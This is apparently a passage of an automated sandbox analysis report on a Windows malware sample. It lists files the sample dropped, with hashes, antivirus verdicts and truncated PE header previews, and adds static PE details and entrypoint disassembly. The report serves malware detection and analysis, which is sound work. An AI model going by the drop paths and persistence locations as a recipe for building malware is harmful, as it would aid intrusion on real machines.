                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a.................$...................@....@...........................S.....?.6.....................................|.O. ....pM...............6..#................................................................................................... ..........................@................0......................@................@...z..................@............ ...0......................@............C...P......................@.............1.........................@....rsrc........pM......p0.............@....HQIHSjN......O.......2.............@....adata........S.......6.............@...........................................................................................................................................................................................................................................................................
                                                                                                            C:\Users\user\AppData\Local\Temp\D54.exe
                                                                                                            Process:C:\Windows\explorer.exe
                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):373760
                                                                                                            Entropy (8bit):6.990411328206368
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6144:GszrgLWpo6b1OmohXrIdF5SpBLE4Hy+74YOAnF3YFUGFHWEZq:Gsgq3b1Omsb7pBLEazsYOSGFHFHW
                                                                                                            MD5:8B239554FE346656C8EEF9484CE8092F
                                                                                                            SHA1:D6A96BE7A61328D7C25D7585807213DD24E0694C
                                                                                                            SHA-256:F96FB1160AAAA0B073EF0CDB061C85C7FAF4EFE018B18BE19D21228C7455E489
                                                                                                            SHA-512:CE9945E2AF46CCD94C99C36360E594FF5048FE8E146210CF8BA0D71C34CC3382B0AA252A96646BBFD57A22E7A72E9B917E457B176BCA2B12CC4F662D8430427D
                                                                                                            Malicious:true
                                                                                                            Antivirus:
                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                            • Antivirus: Metadefender, Detection: 29%, Browse
                                                                                                            • Antivirus: ReversingLabs, Detection: 81%
                                                                                                            Reputation:unknown
                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......l..U(...(...(...6.).1...6.?.W....l..+...(.......6.8.....6.(.)...6.-.)...Rich(...........PE..L...a.R`.....................v......@.............@..................................&..........................................(........{...................0..........................................@...............8............................text............................... ..`.data...............................@....gizi...............................@....bur................................@....wob................................@....rsrc....{.......|..................@..@.reloc..4F...0...H...l..............@..B................................................................................................................................................................................................................................................................
                                                                                                            C:\Users\user\AppData\Local\Temp\E6C4.exe
                                                                                                            Process:C:\Windows\explorer.exe
                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):322560
                                                                                                            Entropy (8bit):6.703621223316465
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6144:RZO3M89ge8ZiiVaOcOCgireB6RgkO4/hzNzGf+GP6f:RZagD5Vovvr9RgA/hZEPa
                                                                                                            MD5:C94FBEF580C7CD0BA874360D0B997F22
                                                                                                            SHA1:6533AF2DAEB72A2E9C8E52194052C1444E203DB1
                                                                                                            SHA-256:19CEF530181D49F24A3513EE5546BF69A12482F66466DB0D8A5C45DA206BE569
                                                                                                            SHA-512:89C0270B8239624F7F2FD1D1D26BC1A5DBBCD7397908230FBA5F80DE69326BC9F52A488EF1D53BD227AB22346484445846A89322224574E02837D04A3BDA511D
                                                                                                            Malicious:true
                                                                                                            Antivirus:
                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                            Reputation:unknown
                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........=..S..S..S......S....g.S..](..S..R...S.....S......S......S.Rich.S.........PE..L....._..........................................@.................................x.......................................4...(......................................................................@...............H............................text............................... ..`.data...............................@....zufow..............................@....ruh................................@....yilub..............................@....rsrc............... ..............@..@.reloc..fF.......H..................@..B................................................................................................................................................................................................................................................................
                                                                                                            C:\Users\user\AppData\Local\Temp\F4CF.exe
                                                                                                            Process:C:\Windows\explorer.exe
                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):319488
                                                                                                            Entropy (8bit):6.687273736877821
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6144:H9ccaRn35MCCXxwaUbmV/nCEHF1qgkruPOaZUGfa5:H+9PMtwFUfCG1qglPOSG
                                                                                                            MD5:50BADD524B2E3FAF0FF050DD5BE8A584
                                                                                                            SHA1:E03B18A84F9926BB68D23D993A859FF0BA6B0BDE
                                                                                                            SHA-256:B3396E7D185C1CA1FAD9A33382ECE95F9DC5CEBCC8E259F7D16A94D4DB74CF21
                                                                                                            SHA-512:F892699F20B1965277B3D594073C2903A40F8C611D9CC467826E9D33F0A9AD315C0CDC4458595F440EB7DB6C9FB70587B7702D8DAB508A26248BE6F674F1D271
                                                                                                            Malicious:true
                                                                                                            Antivirus:
                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                            Reputation:unknown
                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........=..S..S..S......S....g.S..](..S..R...S.....S......S......S.Rich.S.........PE..L.....h_..........................................@............................................................................(......................................................................@...............H............................text...F........................... ..`.data...............................@....gemuta.............................@....yid................................@....yofuyiz............................@....rsrc..............................@..@.reloc..\F.......H..................@..B................................................................................................................................................................................................................................................................
                                                                                                            C:\Users\user\AppData\Local\Temp\FD6B.exe
                                                                                                            Process:C:\Windows\explorer.exe
                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                            Category:modified
                                                                                                            Size (bytes):537088
                                                                                                            Entropy (8bit):5.840438491186833
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12288:SV2DJxKmQESnLJYydpKDDCrqXSIXcZD0sgbxRo:nK1vVYcZyXSY
                                                                                                            MD5:D7DF01D8158BFADDC8BA48390E52F355
                                                                                                            SHA1:7B885368AA9459CE6E88D70F48C2225352FAB6EF
                                                                                                            SHA-256:4F4D1A2479BA99627B5C2BC648D91F412A7DDDDF4BCA9688C67685C5A8A7078E
                                                                                                            SHA-512:63F1C903FB868E25CE49D070F02345E1884F06EDEC20C9F8A47158ECB70B9E93AAD47C279A423DB1189C06044EA261446CAE4DB3975075759052D264B020262A
                                                                                                            Malicious:true
                                                                                                            Antivirus:
                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                            Reputation:unknown
                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...?y*...............0..*...........I... ...`....@.. ....................................@.................................`I..K....`............................................................................... ............... ..H............text....)... ...*.................. ..`.rsrc........`.......,..............@....reloc...............0..............@..B.................I......H............?..........hX..}............................................(....*..0..,.......(d...8....*.~....u....s....z&8.........8........................*.......*....(d...(....*...j*.......*.......*.......*.......*....(....*.~(....(^...8....*(.........8........*.......*.......*.......*.......*....0.............*.0.............*....*.......*.......*....(....*..0.............*....*....0.............*.(....z.A.........z.A.......................*.......*.......*.......*.......
                                                                                                            C:\Users\user\AppData\Local\Temp\FE11.exe
                                                                                                            Process:C:\Windows\explorer.exe
                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):905216
                                                                                                            Entropy (8bit):7.399713113456654
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12288:KoXpNqySLyUDd48BpBIfj2ucA0ZeEbVkw+lMbguodE1z0oLxCZJ9tzj8kpcunn:KoO9FDZpBIMR/4Mzv2Jnp
                                                                                                            MD5:852D86F5BC34BF4AF7FA89C60569DF13
                                                                                                            SHA1:C961CCD088A7D928613B6DF900814789694BE0AE
                                                                                                            SHA-256:2EAA2A4D6C975C73DCBF251EA9343C4E76BDEE4C5DDA8D4C7074078BE4D7FC6F
                                                                                                            SHA-512:B66B83D619A242561B2A7A7364428A554BB72CCC64C3AC3F28FC7C73EFE95C7F9F3AC0401116AE6F7B41B960C323CC3B7ADAC782450013129D9DEC49A81DCEC7
                                                                                                            Malicious:true
                                                                                                            Antivirus:
                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                            Reputation:unknown
                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................g.....q.I....v....h......E....x.....f.....c...Rich..................PE..L....[._................. ...2.......0.......0....@..........................P|......q......................................Xf..(....p.. ............................1..............................@Y..@............0...............................text............ .................. ..`.rdata.."?...0...@...$..............@..@.data...8....p.......d..............@....rsrc... .n..p......................@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                            C:\Users\user\AppData\Local\Temp\bzxmernq.exe
                                                                                                            Process:C:\Users\user\AppData\Local\Temp\F4CF.exe
                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):13996032
                                                                                                            Entropy (8bit):3.7880507743534038
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24576:++6Vg1VGTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTL:r1n
                                                                                                            MD5:19D1F6C45BAA1FAB9256C4AA8ECCA231
                                                                                                            SHA1:E32408B2B06F13F48D9BA597BD53CCD3ED57CE68
                                                                                                            SHA-256:5DD26C035DB298110EE036225F2041DD52B863F9B8A8DDEDD6D23093E7DBBEFA
                                                                                                            SHA-512:C08B4A2744D73B0BAB93A71B135934E4FCF5B850A6AE8524C08C8119FEF35016AD604D5B38AA0BA75A2E437125F2B88BCDF8A649214723954DBED59D3C6CA43B
                                                                                                            Malicious:true
                                                                                                            Antivirus:
                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                            Reputation:unknown
                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........=..S..S..S......S....g.S..](..S..R...S.....S......S......S.Rich.S.........PE..L.....h_..........................................@............................................................................(......................................................................@...............H............................text...F........................... ..`.data...............................@....gemuta.............................@....yid................................@....yofuyiz............................@....rsrc..............................@..@.reloc..\F..........................@..B................................................................................................................................................................................................................................................................
                                                                                                            C:\Users\user\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\SyncVerbose.etl.0001 (copy)
                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):65536
                                                                                                            Entropy (8bit):0.11022541052871243
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12:26uXm/Ey6q9995ahq3qQ10nMCldimE8eawHjcxRH:267l68vLyMCldzE9BHjcxR
                                                                                                            MD5:E125A0B0D33FEA7326D8F39DDADEDBE4
                                                                                                            SHA1:D74F3115620849008B523785B5A106C57A51F949
                                                                                                            SHA-256:F6E52C6DFAEB03E2D0AF3A4C41111580BB9783D7E9B8D5AF75644E84CD429D1D
                                                                                                            SHA-512:479D5119E66E51345436BB6311D342A36039961A7A37129BE6AF9E23EDA33F42C1EAAB2DCAC3A01B33F8A473BA2C773AA8F840D88AF6B9D1FD19EADAED0719CE
                                                                                                            Malicious:false
                                                                                                            Reputation:unknown
                                                                                                            Preview: ................................................................................\.......f..|.....................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1.............................................................W.}..... ......;z............S.y.n.c.V.e.r.b.o.s.e...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.S.y.n.c.V.e.r.b.o.s.e...e.t.l...........P.P.\.......O..|....................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                            C:\Users\user\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\UnistackCircular.etl.0001 (copy)
                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):65536
                                                                                                            Entropy (8bit):0.11267307713306338
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12:f/lTXm/Ey6q9995abOL1miM3qQ10nMCldimE8eawHza1miIl/:3lKl68k61tMLyMCldzE9BHza1tIl/
                                                                                                            MD5:7B28FA88D1E22EC7DB348008C787F608
                                                                                                            SHA1:8E5BE4EF718FAD2722F84787388AA48A0C010D96
                                                                                                            SHA-256:EA8CA5EE6AD32D729B991484A4E48FE308EDA7D6BC0C6E91FB63D84DF3D7253B
                                                                                                            SHA-512:9CF77D6FA866211F06E4FA296A567D8FE6914DE065F830AD725268FA0D238B20F25040ACBCF5298E340E12ABF3FCA25C84B86AEA055CD9DFB4E88CC6F9A9B82D
                                                                                                            Malicious:false
                                                                                                            Reputation:unknown
                                                                                                            Preview: ................................................................................\.......b..|.....................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1.............................................................W.}..... .....5.s............U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...e.t.l.......P.P.\..........|....................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                            C:\Users\user\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etl.0001O (copy)
                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):65536
                                                                                                            Entropy (8bit):0.11272810934557069
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12:AuTXm/Ey6q9995ajL1mK2P3qQ10nMCldimE8eawHza1mKRP/:/Kl68QL1iPLyMCldzE9BHza11/
                                                                                                            MD5:C6EE22D81C57583D05F2D3770AA07F2F
                                                                                                            SHA1:EDD0CF3C45CCDC26681C28B1512DC7AE4C291CA3
                                                                                                            SHA-256:AC595BDD3D34C82BB67344DC1143EEF8CC6D1D049C6A2F4A25EC7F78EE0BF03E
                                                                                                            SHA-512:2E8BCB7CFA7ACB98047ECDF6401B40FC930562E3EE09D4623C59570DCFBA905A01384338A8EA268C2643A9ED4C70B648EAE83B2F8FB66A8C6192B25EF1C4787F
                                                                                                            Malicious:false
                                                                                                            Reputation:unknown
                                                                                                            Preview: ................................................................................\.......0..|.....................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1.............................................................W.}..... .......i............U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...e.t.l.......P.P.\.......<..|....................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                            C:\Users\user\AppData\Roaming\iscgwer
                                                                                                            Process:C:\Windows\explorer.exe
                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):320000
                                                                                                            Entropy (8bit):6.687125826295423
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6144:+WbLfFa4xe0ga5Pvt8Cta8wm/jso47Qtgi5aR8vuz+sGfeqK:+SFes5PvHtayQoDtgpR8vuy6
                                                                                                            MD5:4E806C42B23B043FA7409D108EECAADB
                                                                                                            SHA1:39D29853690F371FB690D427D34EACE3946B6553
                                                                                                            SHA-256:847FD5A4CAE442AFC596F09B8A8F2DE13BC85356DCD8B897A3B4A89081F5046F
                                                                                                            SHA-512:24DA5692EE3AFBBC71D62CBBAC33BB094E326E0FA3F234C580C7A994F1C47A768AD1579F9652BF2B7174541C0E447BBD5952F8457F3CBC3B4BD9613B165D7332
                                                                                                            Malicious:true
                                                                                                            Antivirus:
                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                            Reputation:unknown
                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........=..S..S..S......S....g.S..](..S..R...S.....S......S......S.Rich.S.........PE..L...m.h_..........................................@.................................u_..........................................(......................................................................@...............H............................text...V........................... ..`.data...............................@....tad................................@....lux................................@....civujo.............................@....rsrc..............................@..@.reloc..\F.......H..................@..B................................................................................................................................................................................................................................................................
                                                                                                            C:\Users\user\AppData\Roaming\iscgwer:Zone.Identifier
                                                                                                            Process:C:\Windows\explorer.exe
                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):26
                                                                                                            Entropy (8bit):3.95006375643621
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:ggPYV:rPYV
                                                                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                            Malicious:true
                                                                                                            Reputation:unknown
                                                                                                            Preview: [ZoneTransfer]....ZoneId=0
                                                                                                            C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\MpCmdRun.log
                                                                                                            Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                            File Type:Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
                                                                                                            Category:modified
                                                                                                            Size (bytes):9062
                                                                                                            Entropy (8bit):3.163844099475939
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:cY+38+DJl+ibJ6+ioJJ+i3N+WtT+E9tD+Ett3d+E3zg+b:j+s+v+b+P+m+0+Q+q+3+b
                                                                                                            MD5:B5DE6DD84C98809EF316370957DAFC67
                                                                                                            SHA1:77B67A0D1C9330A407DF002E7379F6D18CA80B1A
                                                                                                            SHA-256:CDAF524879DD680A9371DD50A89837DED2D5E354468EDBFDEE62FB5CB75EC16C
                                                                                                            SHA-512:D9E65B73D9EE9245318B340EF9862AD9355480107D33537F89342C2B1B92A04EC4B256269E767915D535664DEBDA98A24120AD43CDEA0700BCC8DFE0CFED4C38
                                                                                                            Malicious:false
                                                                                                            Reputation:unknown
                                                                                                            Preview: ..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. T.h.u. .. J.u.n. .. 2.7. .. 2.0.1.9. .0.1.:.2.9.:.4.9.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e.....E.R.R.O.R.:. .M.p.W.D.E.n.a.b.l.e.(.T.R.U.E.). .f.a.i.l.e.d. .(.8.0.0.7.0.4.E.C.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. T.h.u. .. J.u.n. .. 2.7. .. 2.0.1.9. .0.1.:.2.9.:.4.9.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.............-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.
                                                                                                            C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\DeliveryOptimization\Logs\dosvc.20220114_215814_003.etl
                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):8192
                                                                                                            Entropy (8bit):3.3009477934568885
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:96:eCHWdj/o+ol5MJ96/YIHCkvI2lHSk+P4klT2YjFzeNMC3dJRW:d2Vgen2ctbCTw
                                                                                                            MD5:79150C3DE7A59F9D91DE45304057AEA2
                                                                                                            SHA1:D04203330C99D91B4726F18611E495829C830F9E
                                                                                                            SHA-256:184C0723489AF3CB59A19B1C8F580CD58C00AEDDBB06EFFAC1BD0D2B2961DA8E
                                                                                                            SHA-512:10B99CBE8C3DF31F63526ED0933A41321EDE3E585967FFD01D0024C662F2E4C0280084D2A472940E8FAC9DA2488EA1C7C7BA25EA8C418246B24A7EDF4BB1043B
                                                                                                            Malicious:false
                                                                                                            Reputation:unknown
                                                                                                            Preview: .... ... ....................................... ...!...................................T........................B..............Zb... ... ..........................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1..................................................................... ......h.............8.6.9.6.E.A.C.4.-.1.2.8.8.-.4.2.8.8.-.A.4.E.E.-.4.9.E.E.4.3.1.B.0.A.D.9...C.:.\.W.i.n.d.o.w.s.\.S.e.r.v.i.c.e.P.r.o.f.i.l.e.s.\.N.e.t.w.o.r.k.S.e.r.v.i.c.e.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.D.e.l.i.v.e.r.y.O.p.t.i.m.i.z.a.t.i.o.n.\.L.o.g.s.\.d.o.s.v.c...2.0.2.2.0.1.1.4._.2.1.5.8.1.4._.0.0.3...e.t.l.........P.P.........T.......................................................................................................................................................................................................................................................................
                                                                                                            C:\Windows\SysWOW64\jdijwvkg\bzxmernq.exe (copy)
                                                                                                            Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):13996032
                                                                                                            Entropy (8bit):3.7880507743534038
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24576:++6Vg1VGTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTL:r1n
                                                                                                            MD5:19D1F6C45BAA1FAB9256C4AA8ECCA231
                                                                                                            SHA1:E32408B2B06F13F48D9BA597BD53CCD3ED57CE68
                                                                                                            SHA-256:5DD26C035DB298110EE036225F2041DD52B863F9B8A8DDEDD6D23093E7DBBEFA
                                                                                                            SHA-512:C08B4A2744D73B0BAB93A71B135934E4FCF5B850A6AE8524C08C8119FEF35016AD604D5B38AA0BA75A2E437125F2B88BCDF8A649214723954DBED59D3C6CA43B
                                                                                                            Malicious:false
                                                                                                            Reputation:unknown
                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........=..S..S..S......S....g.S..](..S..R...S.....S......S......S.Rich.S.........PE..L.....h_..........................................@............................................................................(......................................................................@...............H............................text...F........................... ..`.data...............................@....gemuta.............................@....yid................................@....yofuyiz............................@....rsrc..............................@..@.reloc..\F..........................@..B................................................................................................................................................................................................................................................................

                                                                                                            Static File Info

                                                                                                            General

                                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                            Entropy (8bit):6.687125826295423
                                                                                                            TrID:
                                                                                                            • Win32 Executable (generic) a (10002005/4) 99.83%
                                                                                                            • Windows Screen Saver (13104/52) 0.13%
                                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                            File name:9ro85QVN0F.exe
                                                                                                            File size:320000
                                                                                                            MD5:4e806c42b23b043fa7409d108eecaadb
                                                                                                            SHA1:39d29853690f371fb690d427d34eace3946b6553
                                                                                                            SHA256:847fd5a4cae442afc596f09b8a8f2de13bc85356dcd8b897a3b4a89081f5046f
                                                                                                            SHA512:24da5692ee3afbbc71d62cbbac33bb094e326e0fa3f234c580c7a994f1c47a768ad1579f9652bf2b7174541c0e447bbd5952f8457f3cbc3b4bd9613b165d7332
                                                                                                            SSDEEP:6144:+WbLfFa4xe0ga5Pvt8Cta8wm/jso47Qtgi5aR8vuz+sGfeqK:+SFes5PvHtayQoDtgpR8vuy6
                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........=...S...S...S.......S.....g.S..](...S...R...S.......S.......S.......S.Rich..S.........PE..L...m.h_...........................

                                                                                                            File Icon

                                                                                                            Icon Hash:c8d0d8e0f8e0f4e8

                                                                                                            Static PE Info

                                                                                                            General

                                                                                                            Entrypoint:0x41b690
                                                                                                            Entrypoint Section:.text
                                                                                                            Digitally signed:false
                                                                                                            Imagebase:0x400000
                                                                                                            Subsystem:windows gui
                                                                                                            Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                                                            DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                            Time Stamp:0x5F68886D [Mon Sep 21 11:03:09 2020 UTC]
                                                                                                            TLS Callbacks:
                                                                                                            CLR (.Net) Version:
                                                                                                            OS Version Major:5
                                                                                                            OS Version Minor:0
                                                                                                            File Version Major:5
                                                                                                            File Version Minor:0
                                                                                                            Subsystem Version Major:5
                                                                                                            Subsystem Version Minor:0
                                                                                                            Import Hash:bfce8d99da2229492c7de3a8a6087683

                                                                                                            Entrypoint Preview

                                                                                                            Instruction
                                                                                                            mov edi, edi
                                                                                                            push ebp
                                                                                                            mov ebp, esp
                                                                                                            call 00007FC4F0A5114Bh
                                                                                                            call 00007FC4F0A44236h
                                                                                                            pop ebp
                                                                                                            ret
                                                                                                            int3
                                                                                                            int3
                                                                                                            int3
                                                                                                            int3
                                                                                                            int3
                                                                                                            int3
                                                                                                            int3
                                                                                                            int3
                                                                                                            int3
                                                                                                            int3
                                                                                                            int3
                                                                                                            int3
                                                                                                            int3
                                                                                                            int3
                                                                                                            int3
                                                                                                            mov edi, edi
                                                                                                            push ebp
                                                                                                            mov ebp, esp
                                                                                                            push FFFFFFFEh
                                                                                                            push 0043DC98h
                                                                                                            push 0041E870h
                                                                                                            mov eax, dword ptr fs:[00000000h]
                                                                                                            push eax
                                                                                                            add esp, FFFFFF94h
                                                                                                            push ebx
                                                                                                            push esi
                                                                                                            push edi
                                                                                                            mov eax, dword ptr [00440354h]
                                                                                                            xor dword ptr [ebp-08h], eax
                                                                                                            xor eax, ebp
                                                                                                            push eax
                                                                                                            lea eax, dword ptr [ebp-10h]
                                                                                                            mov dword ptr fs:[00000000h], eax
                                                                                                            mov dword ptr [ebp-18h], esp
                                                                                                            mov dword ptr [ebp-70h], 00000000h
                                                                                                            mov dword ptr [ebp-04h], 00000000h
                                                                                                            lea eax, dword ptr [ebp-60h]
                                                                                                            push eax
                                                                                                            call dword ptr [004010A4h]
                                                                                                            mov dword ptr [ebp-04h], FFFFFFFEh
                                                                                                            jmp 00007FC4F0A44248h
                                                                                                            mov eax, 00000001h
                                                                                                            ret
                                                                                                            mov esp, dword ptr [ebp-18h]
                                                                                                            mov dword ptr [ebp-78h], 000000FFh
                                                                                                            mov dword ptr [ebp-04h], FFFFFFFEh
                                                                                                            mov eax, dword ptr [ebp-78h]
                                                                                                            jmp 00007FC4F0A44377h
                                                                                                            mov dword ptr [ebp-04h], FFFFFFFEh
                                                                                                            call 00007FC4F0A443B4h
                                                                                                            mov dword ptr [ebp-6Ch], eax
                                                                                                            push 00000001h
                                                                                                            call 00007FC4F0A51B3Ah
                                                                                                            add esp, 04h
                                                                                                            test eax, eax
                                                                                                            jne 00007FC4F0A4422Ch
                                                                                                            push 0000001Ch
                                                                                                            call 00007FC4F0A4436Ch
                                                                                                            add esp, 04h
                                                                                                            call 00007FC4F0A4D314h
                                                                                                            test eax, eax
                                                                                                            jne 00007FC4F0A4422Ch
                                                                                                            push 00000010h

                                                                                                            Rich Headers

                                                                                                            Programming Language:
                                                                                                            • [ C ] VS2008 build 21022
                                                                                                            • [IMP] VS2005 build 50727
                                                                                                            • [ASM] VS2008 build 21022
                                                                                                            • [LNK] VS2008 build 21022
                                                                                                            • [RES] VS2008 build 21022
                                                                                                            • [C++] VS2008 build 21022

                                                                                                            Data Directories

                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x3e3c40x28.text
                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x1500000x83d0.rsrc
                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x1590000x1e00.reloc
                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x13a00x1c.text
